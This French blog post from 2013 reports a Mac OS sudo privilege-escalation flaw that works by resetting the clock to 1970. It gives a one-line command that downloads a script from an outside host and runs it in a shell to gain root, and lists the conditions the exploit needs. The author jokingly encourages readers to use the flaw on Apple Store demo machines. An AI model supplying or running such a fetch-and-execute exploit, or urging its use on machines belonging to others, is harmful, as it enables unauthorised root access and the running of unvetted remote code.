(modifié le 30 août 2013 à 23:08)

J'ai été alerté par @pyrou d'une faille liée à la commande sudo sur le système d'expoitation Mac OS, pour ça il suffit d'exploiter une faille vous téléportant en 1970 🙂

macos_faille

Après Linux c'est au tour de Mac OS de permettre à un utilisateur de s'approprier les droits root (super utilisateur).

Pour y parvenir il suffit de taper cette commande dans un terminal :

source <(curl http://kwix.fr/sudo.sh)

Deux conditions à l'exploit, il faut :

  • être admin sur la machine (ce qui est différent de root), c'est à dire avoir le droit de changer l'heure et avoir le droit d'executer la commande sudo
  • que le réglage de l'horloge ne soit pas verrouillé (chaque groupe de réglage pouvant être verrouillé sur macos, un mot de passe est demandé pour pour modifier les paramètres)

Reste à attendre un correctif par Apple, l'info de cette faille étant confirmée aussi chez MacG. En attendant vous pouvez toujours faire un tour chez les revendeurs Apple, comme l''AppleStore, et utiliser cette faille 🙂

note : url mirroir du script de @pyrou

Auteur : Mr Xhark

Fondateur du blog et passionné par les nouvelles techno, suivez-moi sur twitter